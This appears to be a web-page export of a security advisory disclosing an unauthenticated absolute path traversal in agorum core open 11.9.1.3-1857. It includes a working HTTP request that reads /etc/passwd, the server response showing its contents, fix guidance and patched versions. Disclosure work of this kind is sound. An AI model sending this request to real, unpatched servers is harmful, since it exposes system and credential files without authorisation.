{"id":24230,"date":"2025-06-27T16:07:15","date_gmt":"2025-06-27T14:07:15","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0022\/"},"modified":"2025-07-01T10:19:14","modified_gmt":"2025-07-01T08:19:14","slug":"usd-2025-0022","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0022\/","title":{"rendered":"usd-2025-0022"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n

usd-2025-0022 | Agorum core open 11.9.1.3-1857 - Absolute Path Traversal<\/h1>\n

<\/h1>\n

Product<\/strong>: Agorum core open
Affected Version<\/strong>: 11.9.1.3-1857
Vulnerability Type<\/strong>: Absolute Path Traversal (CWE-36)
Security Risk<\/strong>: High
Vendor<\/strong>: Agorum
Vendor URL<\/strong>: https:\/\/www.agorum.com\/<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: Requested
CVE Link<\/strong>: Requested
Advisory ID<\/strong>: usd-2025-0022<\/p>\n

Description<\/h3>\n

agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration<\/p>\n

Proof of Concept<\/h3>\n

The dynawebservice<\/strong> of agorum core permits an attacker to access arbitrary files on the system without requiring authentication. The following request can be used to read the \/etc\/passwd<\/strong> file:<\/p>\n

\n
<\/span>GET<\/span> \/dynawebservices\/wsfiling\/?action=getTemp&tmpFile=\/etc\/passwd<\/span> HTTP<\/span>\/<\/span>1.1
<\/span>Host<\/span>:<\/span> localhost
<\/span>Sec-Ch-Ua<\/span>:<\/span> \"Chromium\";v=\"135\", \"Not-A.Brand\";v=\"8\"
<\/span>Sec-Ch-Ua-Mobile<\/span>:<\/span> ?0
<\/span>Sec-Ch-Ua-Platform<\/span>:<\/span> \"Linux\"
<\/span>Accept-Language<\/span>:<\/span> en-US,en;q=0.9
<\/span>Upgrade-Insecure-Requests<\/span>:<\/span> 1
<\/span>[...]<\/span><\/pre>\n<\/div>\n
The servers response will include the full content of the requested file, as can be seen in the following output:<\/p>\n
\n
<\/span>HTTP<\/span>\/<\/span>1.1<\/span> 200<\/span> OK
<\/span>X-Powered-By<\/span>:<\/span> agorum core
<\/span>Content-Length<\/span>:<\/span> 3510
<\/span>Date<\/span>:<\/span> Mon, 28 Apr 2025 06:40:05 GMT
<\/span>Server<\/span>:<\/span> Apache-Coyote\/1.1

<\/span>root:x:0:0:root:\/root:\/usr\/bin\/zsh
daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin
bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin
sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin
sync:x:4:65534:sync:\/bin:\/bin\/sync
games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin
man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin
lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin
[...]<\/pre>\n<\/div>\n
Fix<\/h3>\n

It is recommended to ensure that user input is properly validated and sanitized to prevent the use of absolute paths or dangerous characters. Always use relative paths for file access to prevent users from navigating outside the intended directories. Implement a whitelist to restrict file access to specific, trusted locations and limit file system permissions to necessary files and directories.<\/p>\n
 <\/p>\n
Users of agorum core open should upgrade to versions 11.9.2 or 11.10.1.<\/p>\n
References<\/h3>\n
<\/p>\n